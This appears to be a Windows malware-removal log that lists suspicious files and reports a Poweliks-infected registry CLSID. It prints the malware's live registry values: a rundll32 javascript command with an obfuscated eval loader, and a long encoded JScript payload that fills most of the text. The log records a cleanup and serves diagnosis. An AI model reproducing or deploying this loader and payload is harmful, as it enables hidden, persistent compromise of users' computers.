c:\users\MikeandBert\AppData\Roaming\Love
c:\users\MikeandBert\AppData\Roaming\Love\mari0\options.txt
c:\users\MikeandBert\AppData\Roaming\Microsoft\~DFKcba9d9.tmp
c:\users\Public\WINDOWS
c:\users\Public\WINDOWS\DigitalLocker\enUs\BITSCTRS.INI
c:\users\Public\WINDOWS\DigitalLocker\enUs\DXG.INI
c:\users\Public\WINDOWS\Microsoft.Net\Authmen\DJSVS.INI
c:\users\Public\WINDOWS\ModemLogs\AMDIDE.INI
c:\users\Public\WINDOWS\MSAgent\Chars\DRVLOCK.SYS
c:\users\Public\WINDOWS\MSAgent\Chars\SYMBIOS.SYS
c:\users\Public\WINDOWS\Panther\UnattendGC\BRMW.INI
c:\users\Public\WINDOWS\PLA\System\EPCL5UI.INI
c:\users\Public\WINDOWS\PLA\System\RASCTRS.INI
c:\users\Public\WINDOWS\PolicyDefinitions\enUs\BRSCRLD.INI
c:\users\Public\WINDOWS\ServiceProfiles\GAGP30NX.INI
c:\users\Public\WINDOWS\SoftwareDistribution\DataStore\Logs\EPNPVE3N.INI
c:\users\Public\WINDOWS\SoftwareDistribution\DataStore\Logs\MSDFMAP.INI
c:\users\Public\WINDOWS\System32\Com\Demp\SQSDRVRM.SYS
c:\users\Public\WINDOWS\System32\Microsoft\Protect\USBPERF.INI
c:\users\Public\WINDOWS\System32\Wbem\AutoRecover\HPCISSS.INI
c:\users\Public\WINDOWS\WindowsMobile\enUs\BRMTBIDI.INI
c:\users\Public\WINDOWS\WindowsMobile\enUs\EWPKCLNT.INI
c:\windows\wininit.ini
.
.
CLSID={AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} - infected with Poweliks and removed.
You should verify if current CLSID data is correct:
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}
   <NO NAME> REG_SZ          Thumbnail Cache Class Factory for Out of Proc Server
   AppID REG_SZ          {AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\InprocServer32
   <NO NAME> REG_SZ          c:\windows\system32\thumbcache.dll
   ThreadingModel REG_SZ          Apartment
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\localserver32
   <NO NAME> REG_SZ          rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDV]]tpguxbsf]]dmbttft]]dmtje]]|bc9:13c5.1:db.5cc7.c89e.b9g6:18e6~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*".replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);}))
   a REG_SZ          #@~^OXcAAA==n{F+2im'xh,)mDk-+or8%mYvEUmDb2ORUtVsJbIStrVc+e'*+* Y.zPhxlc3XwC NAx\bDKU:xO?DDrUT/`rYhbxNb.YJ*ia'A_Ew'/z/Dn:2 wwSkx[GS/2WSnM/4V^--7FcT-'wGhDd4VVcn6Ji6xU+SPzmOk-nor8L^YvJj^MkwOr o sbs?zkY:r(L^Yr#I0!x^ObWx,^N `#PO.XPDY;DU~mR]+T]+mNcE_|S\w'/G0DAmDn'-skmMWkG0D-wxY~WMl:AWM3PknOEa-'x[www7  !cX!F {w'/wEbp8^lD^4`n* M+Y!D ~!p8N0!x^ObWx,[`!# XxU+SPzmOk-nor8L^YvJ\dX:V+ U+.\.oHJ_K:nR+RZE#p6 Wa+UcrM2:E~!~0msd+*iXRd+U[v#IE6U'mR3aalx[3 \rDKUs+UD?DDk okcJuYn:a]wwr#_! /!4/D.rxT`!RsldO&x[+X60vJ&E*_FbI!0UY{;6xQrRD:wri!WY{0 ZM+COK+XOsbV+v;WxD~DD;+SR8#Ik6cE6Yb`!0Y  MkO+vacDnkwKx/AK[X*i;0DR/sK/+vbi!0'6 /DlD+P+aOwks+v;0 ~O.!+#I;6Yx0c!YobV`E6xDbi!0d'!0O }w+ )/:+6DjODls`bi;WkR]+m[`y#I;6R.rD+cE6dcInmNvE0DRUryO+#*i;WkRZ^G/`#p;WR;VK/n`bI6R9+^nYsrs`EWUD#Ilc]!xcr-rJ_!0 QJ'J~z$ErnDPz GD/Ym.OJB!BFbiW G+s+DnsbVnc!0xbI)8Atbs`Z6RwkV2Xr/D/cw*#`r6`m9U`*''Zb`NvJr#I8[crtOYalzJNGA VWC[c:rmMGkWWDR1W:JNKAx^WCNJb&{J*zz{*~Z!8{Rv2ZAO*G9 %obWRbwAX/yFA)/lc&bU9WAkvc!OnAO%O&TOX% s/Erbi)`lc3U\bDKxh+UOvJKDK^+k/Eb*`JCE*'Eka,`,:+XYRAx1GNbxLT=))j;qqc!+D?YMrUov$;WU\n.DTl)w.WsACdvcjOMkUovv9CBl+y}F(:gTlq,;qVNVn8At1hsDqZ48iMwXIqV[!jXFs~-myVTCq,EKPz/Pw;\MoZ429*h?"im .s|j!L 8I*1!.((.ZLBs~t1:oYtp"V^xtd8A4^ssYtp"V^k4}(&HaNVV\(LZa|j!L8IX^V.N&/IU}("q^:lj($VK#D8 ^V(U3{BwI*^!jZ[^d\M#HnjYA1C~34yF4lq*[6Nwf9p9H}lT]MOYIsEJV"Vt:^;}`IX8ssYC gA^&gs(Bk+UoW::jfS`,rls.%[;AKp1Z}Z;i:j:(M#L[!^\8kl$m21s8q9/nilt8`G&VB^}s6VI&"s}AIs4V.UeoIV&r3aSsDPn(g!\TEihj:8Mj%NVV-8b*s8 ^!J3w"1 #D5s6*5xj24VIsm0s%ey.y1q!+rVxq8k0E"M#:C lV]C^;5qF2eZF\tuj/t?TrUXg}qF\1x^H4yIq4VjrJ;I:I 6.}?0;]Mj:mXV#u^ht?TrN;qd(01/epgyJs~qI:aa5H6K\wd}qpdpq*"C`1/Ip1.S2wq[MOf(Moy^z&/ FgXm2Is8U*1[ X!Cg41&]A}q6V\ wT}j!2rHIinoAV5U.a4M"s^kl2\tw8hjf8 l"N_9qe2I\^rTkiV"P1M#Nlqs/::wO}U6(lqIs} VKm mkjCjr8M^L&ka4if^y[MjOS^9sts6Vef"w8 W;5 ok4VVE\!g-4 }s4 I28y*yoPW+j&"48:"t1:}/Bo~t^:wO}oIs^ HwJsgV[2^O1Ma^4q.E9MwTlq,;Is64t2HW&s984x"28`/:oEe 9VtZ&2rHIinoAV}Ujw8M"s1kXA}q}w(:jH}oIG4ypG(0VE9h,M}?&d(V~FI:awezXqC"sp VPCqm/Phj&i X-9Zaqlo9!9wdqbhVjs.T[o9EjuVS}?SViMwXIqV[!jX^X0;jy.TjqFh8!jYtlTI(]a4y*M(MwUmHorj .;[VVY\j6g5l4t j3&kVG^hj![(x;q;IinoAV}Ujw8M"s1kXGms.t9Mji+oAs|;3{Wq}F(h1ZlO;(M9tF$t^hwY(Z48jVszeqFV[!jXFs~-1 sZlq,EhKzdKqs;}VsT829*hjI`mxjsF.ZoqFH!^h^EtFZL9AF-t_./tjX4iMwzIq^NV.Xns~-myVTlq,;K:2/: s!}MwT8&x*h?]j^UjVF.ZL81T^sVEtqZoBs~z( H^}_.X\?0{9w1Xm2Is8`sy1+.D5:XXK.DA1C$28+8tCl[rNw9[o9Xt l!]MOOIs!S0NV92w"my.O5s62toHWnp6olMjzt?8nI:2Vef"GBsR;Iy6-ess/}pgyt8r(CsG5q1W\?zOpq*Vq;IWJ06\I+sZlO;JVgh(Ms!F/xmpZ&2H!apU*s^pjt8CtG&VHlm2IV(?lV4Vhr|o!{Bw.E1+ss}jl4[M^ \jqV[!4\tCt19w1X^2IV8iwy^ jOI:alS0NV9s"XmVjGq0F2e29\1+,sNZlpCWytkX.8Ugtt:j65oI2[s.1tp"W8 ""&kVFms.!9(x;q;I#4 14ts.rIpIaN:jHt("W( ]yJV9V[28sNVt-t;ok]+j!iCx-I!o0}_9V1&tr|U*B4 }-CyjWx!*84MSd}Z44`&sy[!jYJVxq4 I28qjEj l!t(x-1sH^m }wI j"S0t44sIdtj9V\s!KK:jfJjOkm:#L[/~Kn(gT}q!;i .E[!^Yt?lB(x]^ms,h` jzNsV%}oH;jVsE\!6^j:jhFZ4r\(^YP+x;tgTqAV;[wA!^r0/Bsj;1 os}`*t9M^+}`FsNVt-t_HE"+.ZKjTCMO3nZBCtp"18 "q4V.(eq*38!`kF?lB(xt7lyjWxMlq4Vhdp;oVPq,39 6^|?02F?S3`CB\e+j3[(xs|U3{WjYZnp"V F8[&Z]SnjYf( l+}o9T(:W] 9\(i94m `+Hsg!1:sEtzTk#V^+mym.nV,t8p"}e8 (sj.8V("&~Xs,dIsFdC_sk( snjVa* wYj:qw##9V#!9Am8w-8A}\]h46PKx4UVB4?^Vtm3aOlj.pl8Nu82.l(+6VmMXG^.aCIj2?e 4}e8*4qV##2s(]+w|i:w*(sj.2.lU!jfp`s$pooA As( 6l}28V]x4qj:4k]i4qi:gGmy9u6qwcCq41}j^T5j]VKZI&5(4p+GAejjIu6qtl: IVHjj*^s^E:24?t!4We ldp t. V1AP "M^!jV(M]VIAt?IVxX5N96p oA#.Il"q9lV9rjsxkC2L6oaM[:99K_V!t`6f#+w2t.gfq]:.Z6Lj2g6.^wU+b,X[ V;`sqMlX]#:82UV#: hKX[ D!H`9.t`p\[f4*H:O}d!]&j:.n}MTa+s,T.01B[A1pUpIwIj42]sa:\!oa63dhtjg9kv1/n`6(}qghijxu"f4 jvsad&wf}v.2?^tsn`w?\#1VN!A.]9x5joAPfgHCKwo:5*8`65tp^HtMj2:sBsl`62Ug}N_NjIVViZNxtsoWpjw}j ^.ty$;##4I}?OBmw9hiZ6?tU^H M\]"fBxmA.Z\2A+j0q"jqI]8b,?\UVA}:\fp:gfj!]:tu9rtswk?sis}zwjtsgr#mx$x[g4ac*u("6r`va5z9r}`i*"uanimx/\jxD5!}D}P^*HL"}1Ap"#`Iw o4&Jy~egMVSGInts4.5y,pK^9%}^s.9%Vqr2^T\jg99#I}VjA}j^(IZ9/]`sA]f~Aejw$9!o~p`py9L^.`N-pU%X}Zw?\hVVN!A.]j\x"joAjp"H#3^64GV$}ZhDi3OD]f9V:2txHj.C`!w+jNt181f  w1guIdp!^"njRcgKBA8f\nCMgdHA}t[GVfjp"*]2^(U2B;I`sA5.z"l:1-I`2-C wh5j/.j&9rJFx:`!]&C 1F#M\j+owt[_Np}#~&CK5+5jo~p`sxt&9/IAs/Hw1t\:tA`pVtIC9}j.j:}.e!j XMHj^epqI9[`65[qw2 M\51347mZIWI!&qp^2.H2NK^Ztwt9HZlVj]jjw/"Z13t#5\#:\9?02tiaizjiz&}j4e\MVSGIx}Mg#}2W*pqIr[`6;1#s~pjw9jV"V5!a;^iwA}jw9KG99[V.r}#~9tyxet2ohm.9wt.4UK8}eHV1#Z*9hwU1:l]Ca5m!sw#s4&]f9%ww- w13}p^ZHCI*`2o~p`ph5j8jpj9aI_tfP;,j\VqX1jw!\K^A`21w\TjsCM\CHomT[AVpjp"1}!gG1jo_4Zq\tFjBp:t5S.As^Z11}39sMX+jx9W5jo.\#\(P?OCA,i#:pc]iwAtsw+d!tmN2NI5jg5K8A/p`sB^yI"3}~pjSAHf4s5jotrOje1T+NAd8NHc pI iLg]qVtsS8I1}jaaI8};H.tt[A.|5s1~N 8ujj\Aq3[nJ+"*HK"TI`w/is}ctqwC}jIq\s^W?`.A"V9\1Z6Up`.$}`2 UTFhpjw/#s\\1yo.]3\A}j\%+Nq-6:ssi906}Fz*jLtAp0sAU(ITlV5XHw1-[A}sUPsxp.^-i.w9jsH3thDX[Fw}?Vs$}jsA}ixICV^#5K45SH,.`ZOpl:A#?`/*eZI?`pt"Syg##.I\dF^\\qj1CV^#p:t}JH,.i906}Fz*jV]AI0sA"s~r}.t]l82.[qY5tP}tNyw+jx9W5jo.\#a6}39Up`F$}`st}#A&}jw$Lsk5b,MI!wfj`s9KG93[s.3U3wI5jw$}3wA5!XF[qw?}jw9|Zsu]0sAP!DAj 9$5KLyjZ*x9Fw]p`s/4Zsu}0sAUp52Nx"$e.wA5y#A}VwA}j\3+ A}6w}.]3\A}j^}"j]AjG9cg28$I`s$p`93^ZsA"%o8}2g]P"A(K]SP"^A}j\/j:}f^V,9]3lA}j9U(y^Sp`2\s\oK`.$pj}d ^N.n+VX|XR-J 0\5!ac89jk[ 9]pj}t[ 1xFf4A#KwCqMo$}2W*(yw!+A}CjooA Asp5is~pjO2]3"I5jox\9tcJy"}I`I!e`wr#3"&ijw3(!1sSH%\t:9$I`s$po}fC06I5i9I5jg]nVwA5!AXi94i!"/p`s}6w}j]3xA}j\/(F[AK0sA" K-I_N$po}UCo9I5i9oS&4 jj8.5jox6owICVjepj.HtA}c]iwM}jw3UsBN+V,1t2w$ljo"jqVe wj\otNKjj$}4L5L$18p&\Jyge1;,*#^s1]iwACMg/tj[7H`5\"35-}V}5SZ} ioNI5i1VN!4]j:1yty4S8sj2PK^TI;%" Gp\no1hPjj$5.LX106&t(\FN.spKGNBi_15"VF+HL".t28p53oAP+9ZF I-SyV# GtxJ+K\]f"i`2o~p`s(M"aj0}A4Zs/}`sA:9IxlK~$}j8y5!a*8!wrt:wi+ sdiAtZ#3"&ijw$"3o~p`swjV9.S2t 5ZFo}`s.`9tq.!"/}jw9q2o2Hog?}jw$pjj-6:2\jPwMF!\3U2B`I_NI5jwup`s$pU,*#`.1jis~lMg/\M"}tje ]Vgri:wjjjj-6:2DP gMP.~/5jo~5ZsA5jx-p`s]p`s!P^I.d"tq.2"/}jwM5V^\\qTcJ&4#5ZFo}`sWeT&hi8zdX0.V,c9FjfrA.$p`1$}`sA`9tq.j"/}jwC\y)c]iwAJyge4H,*#^.1]iwACMg/t2^ZK:Vr`2x$p`1z?A9i]_NI5isnpjw$}"ImCoS[%4 j"/p`s!6q.163xkng6j:VM+`q&"(9op`s/.8}i;,t jMp3wo}jwMIjXWes5&JXRXjU%"#`VJ"4C!"!5joxAs2gM^Ap`s$pqs5C`*?I+tI.j8V]x429!oA}i"\^9"p`sBiA.2jPxM[Vz"dX0Xp^m\s\-K`.$pU%"#`3\ooZKjj$}.j9t3t i9t\Jyw3SZ}hioNI}ix5CV^p}Z1sSH,.UKx!NwA+SH%a];,MjfN2jjw9]x9q`Vt; #1cJ I-SyV# w.;##4s#j8V"xswp`sA5j"(jsI54Z!A}`2\otNKjj$}4L5L$C]+aAjx9.pU%" Go\no\IPjj$5?0.Go\s1AK`.$pjqT^.sL"39~pj0z]x"p9k0\\i5\\RzI }}\H%\\i5\\O+UsLX1Zw&\Fw$.^3amZwBn`q&"UNdpjw/#s\/\Kiy[TjA}jSTj`*o}`s;e%~}6(I-dyLy.sFhjs~r.:Id}wIJ#;,Mq#sWjjw38yx `Z0\H!XM Vz*.s*3}0sAjT8sCK~$52\.yH\9kR-.`,2N;/-JH,."+V"Ky~$}(\E}24A}ix(CV^#:V+JH,.P+a&FXR-d 2\.yH\9kR-.`,2?b/-JH,."+V Ky~$}.\\t3tCi!&\Jyw34.Ah[b%\H9xM8VzfdX0XIV,t9xI-S.s/4213[AsA"hs}lsx5\kR\}.3 P3S&JXR.KstCnb/\J"^IH3j+gX07rjst:jAfj`s/.ywt#j3*9r%7.jO2#Zk\dX1; #9LJ&I-S8.Kt2HDJzR\#j95`j0Sp`s(yx!I8ArSH%a]V,3`u57Syx-]wA5([A}ix\}3""p`s!PZwq#3"&ijw3d!tNpoNI5jg\rAVdHq93[ w2gosDpVw$}w|5joA}igri:wj.w.HtA}\jswA}jw3(y[ lZsAU.~oIAId}V}(#j.1}31Ajs9f}XOE}2t2H#"A}Vwop`sB}Zw? u^r[:9]`3o~pHYA"!\$p`6.p`YU}`2cgs1t}V9*8!wA"joAjPxq}3x$p`sutZs}]iwA#j8%"3q5p0sA5jj$p`s3SZ} }otI5i1tjV9XFy~Z12oAP!DA]jw$p:o+iZIc}p0\}3""5joV}`wF5jw]p`s34Zp-i;%\g!6V.!0a[!w}(!sI]uxHtM\dm`99[0Nt}iw&}jw9:xH&rAtA5jxp.U%*. N3}0sA"hs}lVx5\kR\}.B.j XMeFz*.^.3]0sAj#~s]szXt.[_lsNnt2w$. 5XHq1KCGjD9r%759aP:4lkd\J"^I#kR*.^93]0sAj#~s]20z":X51H%\tjx-rAITp`s!eb,3q3I7.\zJXR!92tLjPw&}.^-?js3^063thDXnMX9:sBIIV,W\3S-S.IdI^}\tZVp"is~l.j ^ ^.jx[c\o\x]2"*p`s38VIljojqnf~ \!sA+AsAUKw!4Z}3SZ}4}oNI5i1VN!4jj 0hj OxF+9Mt2&X?qIi6G.5e T6P ad\s2&j`wcts\fKZI*p`sK^21cto}2I!5a}jwn1 2n#%wDt2x3?w9e]GIp#iwAnf~ 1y4A1`sA:&gK+GA N2N36`sA: IV53DG}.wA5!]p#f9fJ W*I tf#omc]iwA}9$5jotlGAIjjw$}Asp1_Io]0sAUpHX?j"/}jwM:!Xj#+4?#K1*SZs]6As\ilj#Kw3d ]I+b%61jZArA.$pqm-tZ}3j%.7rjj!}jwp}Ko:P+^YHFz-Sys$CA1I}i5\ts4( q^+b%\g2ZX50s\|y}f#.I3"i}~pj4]]xjH`3BI}ixIJyg rG}(\2H\JzD2is9f5X1!rA}FUsx/j`s/HA9rC:AIjis~.K5aP:wM"V]\ilj#Kw3SyIenb%6^iZh62j$5j0WKjAW\3w9p`s/.Vw##s1."V*I.Kw6#C\*53HI}ix5Jyg 42tf#omc]iwA}(9$5jo5S8Ndy0a5`F%I0*}}0sA5#.~pjw38!1Dk0\\iOriV\*jjjztH,AiP4A#Kw6jse7r:st`ZOp42wiN8s$}:N&9zYVl(9B}jw992t]+Os f"d}V}BC.V1i3xA}j0a9!o\4ZVI"Cx\}V}dA/* s,A"3s~pj0z\2wA53oA}ix(#?R*. N3}0sAj XM#!"+"2}Zj^sA\!w$5qN }b%"#^.j9%3X5!^.6j8p53oAi906eVzXHjVut2NICTwA#:X3d!tj}2tI5jg3+A9XK^9pi^st"ht"jjw/^jw::1K]VxA}.z*.sV3]0sAjTZh62j$5j0WKjA;`Mg/p`s9Kw9piZ61UPsV}3\/8F\s12oA]sz\ts\5?A9i]_NI}iwC}jw$5?1WAF1"jw$.`NG581.}`2\tq}MSywte OvjC[I}iA&[&1.Ko1f]`sAP gMP.~/5jo~5ZsA5jAqwtfjVtKi`sA5i1K53w\F IcI!t1i3xA}jwUp`s$}HYt]p~A}j"+UM]~.H/c"(4$p`I}?0%*e8A/IT}n}XD(e9L" 1AtTwA#.\4KA*PioNI}ix6}.\6jZ0..sH\}w!NZ2.?q6$}`sAUpIV}30aijwYIjafj#~A}8t123" GsS63X?F!0a"jo~?^2\tFI*5qN!.VsFCwAI5ip7}s\Jyw\q2oV]qa6}:XGm`1ue`w?#Vx}#Kx4UVBq?Z6?jx4ilj.#1wjT\`}.U 6Vj2\KPVxj`Vot]94Z]C99K^9p}^sc\o\.83`X5jog5Z}1`2x$p`s.p`s$]At?jos\pjw$}(Thj3oI}iwA}j^d}w9B8VIKi94ij"!5joAl.Vk5jS.}N1]?U%"#s% 5h}HSXR-J "5k1Me+9&ijw3SyI nb,Mi+9&ijw3d ]q+b,M`9fj`s9KVIpnVFn`%jSKK5a]V\M5!X?#TxI#KxGHA!A}`stj!9vijw/(!o p`sxUXV`FVI^}$i`sA5ip7I:jf[FwA5K#5#T&y}:Xr4yw}8b%\Hu56e!9tgj4!jo.t5.w/p`s9KstCCN3\d"V"5jX$nVwA"Z1MeU9&ijw9KstCCN3\J"^IJ&4e9!qwp`sWI!&aps6r48}+8b%\sbHj:Xr8XR\Ik0\J"4^j"/p`suty%&\3wA#Kw4m3X5p0sA`f4 }AI/p`s3[0I35s9"+C9#[y4s5joftTwA}.z*. I3}0sAj S6#2^T"V2xmZV.`f^jpZNUpqN$}`s.d"3X.Fz*#xj253oAi906e.z*.0Y3}0sAi906e.z*j3HAp0sAU("!.A5X}jmTiA}3: *Gp3w/#:0DK]q}VwA}jO2|Z9$}`sHut*tj"!5joxH`5\"3xaIZ3aIN.!} sA"fq7Sy^s]x9qmMq.\ &\tM\2KA*Ct2NI}ix6}j9U5jB~p`2\}w\H0Ve5sI]\H,3\ht"5jw$ijwA"Z06[pt*CVjerw.utZss}iwACV^emy^7SH,." Or.U%-Vt%}NIqqP9V1jR-JXR65:1y]3\A}j9UI`s]}`2\\qj9J&4 m!qjp`sx}sw].U%*. I3}0sA"%.bKK4/tx^LUj#A]s9HH!^}lHYBi_19]sa5e9Vq3TWpZ*:5FwHrG}Tm`tB\`.|5V9"5jat8FwA"Z1M !9&ijw3SyI9ijsw\qj9C(9rd H~+b,1`fTaKjA/p`suCqYjt3s~5938!9FdX0\HugCty4]U,];,M#Tw&ijw3:.t\N 1F5 9ip`s34.AfP`sA"V*o.L1*]jwI5jot} jA}jw9?s}h#;,M u9&ijw9:VB^joWXtjgB4s.3|H%-JH,M\os2jjw$iC"DqC2.}jkXi:\fj`pf 05c#vwp[mde9f#~|.9?\K^]IGNCINNd}s,k"3w~pj9U]2wI5jot}+a ijw3SZ}piotI}ix\}!OT5joxH05!`f1-S.s/4Z.KnAsA"+N\1Fj$}wf"C#I}ix\[3`Xp`sutZs}]iwAJ&4 1!qjp`sx}sx$KZW"}H,+JH,35V,}lMj3FXR\}.3\no`cP.j$pjN4PoHc]iwAejat(Fo~I;,Mqjwfj`s9Ksts];/\d"V"ljK"tXO dX1wj%g}JFz-S.}oj;/\JzDri:\j`2\w3\`ZR-.jb*.063}0sAUpHXS!"/}jw9t3eXiuK\Jyw3S.sd}Z*Wti5DJXRX`?0l^st::4}j`s/.G}$P_j\dzYA+2x/ Ma}qM^\[rR\#j\}SZ}4ioNI}ixIJ&4p"jqwp`sWI!w}lAYopZs$}Z*W\ipMSXRX8yjs}joA]V5\]V4$+ws$}^w(#u\2]f"i9!o~p`swV\.K`.$pqV/C 9fthw7p(9$}?Ocj!s1]iwACV^e}H,+JH,.i/O(CMg/tftxm.sZ"2x$p`3aIb,!}s,A5i.wpj\KJy\s}joA]h"\}.w$pqN}J8NWeT&6} Ra\Z1h}.o `ZR-K:VqK^9hnwst5is;p3w/#sIX\!HA}igAJy^4I N(#`Y;#%tcH3x(X07r_WXgCta1AI/p`s!P sqqP9VH3OJXR65V}\6 wM[!4]Kqwt w3&i/R\#jOGjyt5SH,.t:Osl^Ve:N}JH,."sb7H9]H!wA5(4r#3AyP."]1Z*3i:9n\VlDPV9Ht.sl1qwktL~"sw$1AF3t2NH(i*y5Vgfn38KgC4n]owFP.".+`65jot1np9cPF"]9jX`}2.rjMDqKjI#HA,]`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA#s\Ap`s$]`sA}iwf}jw$5?07rAsA:M9$p`s$p`s$}`sf\Ts~pjw$}jwA5j1qH+On}jX]? wP].IA#parj.\V1MB$KoV95yjo.A.fN`I]8yYI5is~pj\/]3wA53qAii^Atjg;I^.f}`sA}iwA}jw$5K]~p`199&g/pyN$p`}U}`sAU#wap9$}jwA5:H&8i^f}jx$p`s$}oNA}iwA}jw$`jo;p`sA5jw9p`s$I0s$]`sA5is~pjw#}jwI5joA}iwA}jl/l`sU}`1A}i"5j:9o5jo p`sA`jw$I`s$p`.$}`sA5is"pjw$ijwA5joA}iwA]jw$p`s$}`sA}iwA}jw$5jogpsVA(C99p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjl}.^xUVoA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sHm"s".D #sjv"joy]T^f}jx$p`s$}qVA}iwA}9$5jo~p`sA5jw$p`s$p`s$}`2!5is~12tqPVjMU3t.\i8*]x9#p`s$]As}tT^A}:9$5joGj`sA5jw$p`s$p`s$}`sA5is~pjO$}jwn5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$pqI5jo.1#!DXjx~Hm2o~I;,A"s\"m`NBjH,*#Z.A"3s~Ij^T]jaA`!aAtT5\P.z*.0,/^0s;]Tt6#!8}m3oV}U,t5jg;qt\m0Hzt8s|9qs~p.z*#Vwf` 4ZtTgx]x\/N^t]CAFhH9"siV"V1jODl WFjVj!mZF2K81*}`9AUishjj]}3w25:a3#oj2^!SAoq+ sm*#%4Z}3g"IXOx;,35.~up`s%pqwt Go&9r%7.j\$PK"1}2ot}+9v}jj$jj9o}j9A[Twci!wf5jq\}2}.UMgoo-N8paiwAA5#s~.j] ?OcjL]x]iwn}!j4IAs+HA1L[iXX]V^rtMGSI^92}2joKqw$N21f\_m6U!NI..~GtLj&mx^Fes`![3a#rwA$P`sH]p9A]jx#t(]\l^1Aqjj(.^9"p:Vz\A9A5is~}!XG^!w g?1ZjpgA[.gU+:IB}s}x]ix5C!^"(3oq5`*5jw.I0}F.ys36A929T.~.:XC#Fjj`22rtT"&ijx.rGA/nNspn9wI}!^UC]0lAI&59/5`1Gp`V/}s,15 V~j9p]x4;5jLc]P^q]D9pZ1f}`sACVw6](^9m32;mZ2\}j!NZt#1`tut8.&`#mSj9p82\95(H.CV"vtL9]N`F9iGA2[T^IJ&4#q1HpqW!"L4(}8Vt1GAj[j}qmis5pjw9[yxA:3oAiP9qi3g].j}X}`%c}#T\tFj}.LXK`}hmsafps}VS.NhPs}19TF_p(a }jTy5.4xPfgACMw!Ij.d}jsCV8x6Xh"2o:5U,(UjlUpZ9/m`.!twNI`3}sp.w#H3^!:3B|] wZnC^$p`.j}`snJTx*\y"H5?OGp VAgs~BS.2Xp8t+\A9w}!9Hr(^.]M9&"CH3]f~X#!9A4wwUjZw? p4}elB:K]wl`9h\xup`w$4Z3TC8}\1+9_pjaj w;:jqx]Tg|^sgrIAsFCwVtCT^F]2D9Ux$j50NAUx^#j0,K?st]}yNZmi9dp:4Bj!8cjx[5]#xX8swt}8q"tV1W]Ug5nM9t`]V+0.*}M&zKsNClwt$i`FA}#9V}j9O}j8953XWiqa5 :ltKj.HiqI?8#aLHjAA5(H~l0.1"sjB+0N$Is1!nA.v`osoj:ltP.j9j2q/}q^YtfwfIoN/[yF/n!"D 2w]:3H~}qY?tVIA.`FVI01JC_VktV,aN!jA]!xF\ Xyj3lvnMDp+`s$}Z6*]hjH}F94"M#"po1CUsjdl:1oNyw]}^};"ob7?XOJP3\A5kOw8owC3"F.q}]}Z!*^TaZtswCUM[2lb,2U2XapZ.9_1fPZs5:+jW.!^s[ wAj2oy\!9st&aVqtU6As1]TtcCjwsjH~Asyq4!myN2I`F]}sNp\i2l12KX (4IgV3Xj#9V#!jj}`1$n tI}+9}}y99n&H;}Ztx:29sN0}5I }TtZ}x:9.\l2S-jgp\!oL]pg&[2jUlA,!tZN&}P4&H2aq.B}rAV.".A*`Waj89\6AV.:#H7H3j#J 9St2sI]sxA^3j}.js [ZtDi3x:n25-q(LlrAs9(MjqI`t#IVV  VNx"UwUj3"-]MlrU3#2HT"}i3k-?j}#}:}Ajigy[y^ 5.[D5Zsl"2gBS2V9HywU}0,A`j%SKC1a]kD292eFj3^ACs0aI I!}^m\\#j262^+gM2jw.s928Bj`,B?NVu^8st:ut.4Fwt]4rq3#A]3"xJF5*?A9C}^Vcj"4C62T.\MsV?Z.q9 a/rw}XN2.oi`}1"ht_If99j.zh}2dcj3t&i3l!?q6]]`11jVly[Cx6m!qA5ZIyU ^omZ12+Npz[Zt9:3I72aGP.I&".Vhj j&j!8%jq.u[ysAtqzyCKg-"j3HswA`2xhj0p*4ywFPwIZ"isyHK9fj(4v:jo2HT4\}!"U.AFHt8t&jiwAijahj(s~pZ629!8t+`}(S2.f} }sqosHl(9/t3xA::}DPfgVC(9$IVt%}N.Zijky[!w313(ZNAcDUKwopZs]p8.}6:2FUi.~l.wH}1c:j#xnUgAtM5zpoV]}ZIcnog2iC9/tjHtN`6;1.galZ*UI`IzjV,f5 ,;lK^U^V4x5K$A6!^2 :\$p:}f}:sw\#4xPF\e9 H2p:A;j:&THV.AHAV]}Z*V` Vn.:\]ic"&5.4l8q4kt2wqpni2];,2\V8A].woI!o7K`sc9!S-.V}jH:.]]`s3\VsA+:OTn2x9jj3*8s4sCK~UrV3A[yNf}+43jF4#Uj3Wlb,.:3\(p`s 01  Gttmp.;pF~382lI:y4/ U4.}jXO.yN]#2t/8sA66fI*"!o}j^VcUMO!4VIU4 tC6`sI"ssG}!ZT]jA!:jsc}pa\H!jHpst%}s,ItTx}\2\2U?OK1^sI5"*}ZF4rV1r}s.x: sh+jw3J!\(`(BZ8"wMH!w/jqw##y,.]hI\tsj]:.]xK0NI5!w\.Nssj0w!}`q*( 